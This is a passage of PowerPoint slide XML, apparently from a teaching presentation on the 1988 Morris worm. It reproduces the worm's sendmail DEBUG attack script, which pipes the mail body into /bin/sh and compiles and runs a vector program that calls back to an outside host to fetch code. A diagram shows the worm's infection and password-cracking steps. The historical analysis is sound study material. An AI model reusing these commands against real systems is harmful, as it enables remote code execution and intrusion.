                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>rm</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> -f x14481910 x1448191O.c; </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>echo DONE</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49"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de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>debug</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>mail </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>from</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>: (/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>dev</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>/null) </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>rcpt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>to</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>: (“|</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>sed</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> -e ‚1,/^$/'d| /bin/sh; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>exit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> 0") </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>data</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>cd /</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>usr</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>tmp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>cat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> &gt; x14481901.c</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" baseline="0" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> &lt;&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> 'EOF' </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>text</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>of</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>vector</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>program</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>] </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>EOF </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>cc -o x14481910 x14481910.c; </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>./x14481910 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="accent5"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>128.32.134.16</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>32341</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>8712440</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>; </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" dirty="0" err="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>rm</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> -f x14481910 x14481910.c </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>quit</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49"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8129101"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="47" name="Gruppieren 46"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9518687" y="78043"/>
            <a:ext cx="2415567" cy="943335"/>
            <a:chOff x="318444" y="1887083"/>
            <a:chExt cx="10880559" cy="3882150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Textfeld 23"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="318444" y="3253205"/>
              <a:ext cx="2488554" cy="949954"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="003366"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="500" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003366"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>1. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0"/>
                <a:t>Gather information about network interfaces (incl. reachability tests)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="Grafik 24"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3005659" y="2873782"/>
              <a:ext cx="1599701" cy="1915513"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Rechteck 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1426352" y="1887083"/>
              <a:ext cx="1733537"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List of Target Machines</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Host A</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>…</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>…</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="27" name="Verbinder: gewinkelt 26"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="26" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="709388" y="2536244"/>
              <a:ext cx="960139" cy="473789"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">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28" name="Gruppieren 27"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3159884" y="1891281"/>
              <a:ext cx="4636280" cy="1399141"/>
              <a:chOff x="3159884" y="1891281"/>
              <a:chExt cx="4636280" cy="1399141"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="29" name="Gruppieren 28"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4613700" y="1891281"/>
                <a:ext cx="3182464" cy="1399141"/>
                <a:chOff x="4476250" y="1520888"/>
                <a:chExt cx="3182464" cy="1399141"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="31" name="Textfeld 30"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4560252" y="1520888"/>
                  <a:ext cx="3071495" cy="823296"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="003366"/>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square" rtlCol="0">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="003366"/>
                      </a:solidFill>
                    </a:rPr>
                    <a:t>2. </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>Infection attempts: </a:t>
                  </a:r>
                  <a:br>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                  </a:br>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>(1.) RSH, (2.) Finger, (3.) </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0" err="1"/>
                    <a:t>Sendmail</a:t>
                  </a:r>
                  <a:endParaRPr lang="en-US" sz="200" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="32" name="Pfeil: nach rechts 31"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4476250" y="2642236"/>
                  <a:ext cx="3182464" cy="277793"/>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dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="30" name="Gerade Verbindung mit Pfeil 29"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="26" idx="3"/>
                <a:endCxn id="31" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3159884" y="2293071"/>
                <a:ext cx="1537816" cy="9860"/>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3" name="Gruppieren 32"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1319949" y="3519661"/>
              <a:ext cx="6476215" cy="2249572"/>
              <a:chOff x="1319949" y="3519661"/>
              <a:chExt cx="6476215" cy="2249572"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="34" name="Gruppieren 33"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1319949" y="4692617"/>
                <a:ext cx="3470649" cy="1076616"/>
                <a:chOff x="1876855" y="4558974"/>
                <a:chExt cx="3470649" cy="1076616"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="38" name="Textfeld 37"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1876855" y="4558974"/>
                  <a:ext cx="3470649" cy="1076616"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="003366"/>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square" rtlCol="0">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="003366"/>
                      </a:solidFill>
                    </a:rPr>
                    <a:t>3. </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>Collect information about </a:t>
                  </a:r>
                  <a:br>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                  </a:br>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>users and hosts, try to break </a:t>
                  </a:r>
                  <a:br>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                  </a:br>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>password, try to connect to</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>Victims with login-data</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="39" name="Gruppieren 38"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="4560252" y="4917314"/>
                  <a:ext cx="610484" cy="487857"/>
                  <a:chOff x="8000117" y="2650708"/>
                  <a:chExt cx="2003858" cy="1496114"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="40" name="Pfeil: nach oben gekrümmt 39"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm rot="10800000">
                    <a:off x="8000117" y="2650708"/>
                    <a:ext cx="1793718" cy="720550"/>
                  </a:xfrm>
                  <a:prstGeom prst="curvedUpArrow">
                    <a:avLst>
                      <a:gd name="adj1" fmla="val 40000"/>
                      <a:gd name="adj2" fmla="val 93008"/>
                      <a:gd name="adj3" fmla="val 25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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="41" name="Pfeil: nach oben gekrümmt 40"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="8210257" y="3426272"/>
                    <a:ext cx="1793718" cy="720550"/>
                  </a:xfrm>
                  <a:prstGeom prst="curvedUpArrow">
                    <a:avLst>
                      <a:gd name="adj1" fmla="val 40000"/>
                      <a:gd name="adj2" fmla="val 93008"/>
                      <a:gd name="adj3" fmla="val 25000"/>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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35" name="Pfeil: nach rechts 34"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4624701" y="3519661"/>
                <a:ext cx="3171463" cy="277793"/>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6" name="Rechteck 35"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5284258" y="4879932"/>
                <a:ext cx="1983673"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User/Password/Hosts</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>User1/</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>abc</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
